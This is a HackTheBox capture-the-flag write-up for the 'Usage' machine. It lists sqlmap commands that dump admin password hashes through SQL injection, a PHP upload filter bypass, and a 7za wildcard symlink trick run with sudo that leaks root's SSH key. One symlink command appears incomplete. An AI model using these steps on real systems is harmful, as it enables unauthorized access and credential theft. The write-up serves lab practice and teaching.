Usage — HackTheBox
NMAP
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 a0:f8:fd:d3:04:b8:07:a0:63:dd:37:df:d7:ee:ca:78 (ECDSA)
|_ 256 bd:22:f5:28:77:27:fb:65:ba:f6:fd:2f:10:c7:82:8f (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://usage.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelPort 80 (HTTP)
Navigating the web application we find SQL injection in reset user password endpoint. Exploit it using the sqlmap and dump the tables in usage_blog database.
sqlmap -r reset-user.req --risk=3 --level=5 -p email --batch --dump -o
Dump the columns in admin_users table
sqlmap -r reset-user.req --risk=3 --level=5 -p email --batch -D usage_blog -T admin_users --dump -o 
Dump the admin_users table to get the admin hash
sqlmap -r reset-user.req --risk=3 --level=5 -p email --batch -D usage_blog -T admin_users -C name,username,password --dump -o
Now, Crack the hash using hashcat and get the password of admin user.
Now login using the cracked password.
Go to admin dashboard and open the settings. Upload the PHP file by intercepting the request to bypass client side filters.
For user, check .monitrc file in user’s home directory for password.
Use the password to login as xander user
Privilege Escalation
Checking sudo permissions, xander user can run usage_management
Checking string, it seems to be running 7za command with a wildcard (*)
Searching on google, it seems to be exploitable to read arbitrary files by forcing an error.
Following the above steps, we can read the private SSH of root user.
cd /var/www/html
touch @uwu
ln -sf /root/.ssh/id_rsa
Now run the usage_management with sudo and select Project Backup in options. It will give SSH key in errors.
sudo /usr/bin/usage_management
Put the SSH in a file, make sure it has blank space at end and permissions of 600. Now use the SSH key to login as root.
Thanks for reading.
